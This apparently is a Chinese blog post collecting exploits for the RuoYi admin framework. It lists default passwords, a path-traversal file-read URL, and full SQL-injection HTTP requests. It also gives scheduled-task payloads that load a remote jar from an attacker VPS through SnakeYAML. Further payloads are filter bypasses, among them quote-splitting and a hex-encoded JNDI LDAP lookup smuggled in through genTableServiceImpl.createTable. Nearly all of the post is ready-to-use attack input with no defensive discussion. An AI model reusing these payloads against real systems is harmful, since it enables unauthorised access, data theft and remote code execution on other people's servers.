ruoyi漏洞利用

1、ruoyi默认口令

admin/admin123

ruoyi/123456

2、前端shiro反序列化

版本过低,基本不能利用,使用反序列化工具不再过多介绍。

3、任意文件读取 Ruoyi <4.5.1

1
GET /common/download/resource?resource=/profile/../../../../../../../{filename}

4、SQL注入

4-1、/system/role/list路径

post型

复制代码
POST /system/role/list HTTP/1.1  
Host: 127.0.0.1  
User-Age  
nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 181  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/system/role  
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))  
复制代码

GET型

复制代码
GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))   HTTP/1.1  
Host: 127.0.0.1  
User-Age  
nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 181  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/system/role  
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
复制代码

4-2、/system/dept/list路径

复制代码
POST /system/dept/list HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie: 
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Length: 0
​
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
复制代码

5、定时任务

5-1、无限制定时任务利用

在vps配置好exp之后,在定时任务处新建定时任务

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps地址/yaml-payload.jar"]]]]')  
​
0/10 * * * * ?  

5-2、黑名单限制了调用字符串

定时任务屏蔽ldap远程调用

定时任务屏蔽http(s)远程调用

定时任务屏蔽rmi远程调用

org.yaml.snakeyaml.Yaml.load(‘!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [“h’t’t’p’://vps地址/yaml-payload.jar”]]]]’)  
​
0/10 * * * * ?  

5-3、调用类白名单限制

利用 genTableServiceImpl.createTable 方法来修改invoke_target为Jndi payload。

漏洞利用方式:

新建定时任务:

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')
​
0/10 * * * * ?  

此时若job_id为1的任务“调用目标字符串”为NILF,则说明漏洞存在,则进一步利用。 实际攻击payload为:

genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")

但是一般会禁用jndi,对value(javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn'))转换为16进制绕过黑名单限制。 最终payload为:

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')

 



posted @   旬常  阅读(610)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!
点击右上角即可分享
微信分享提示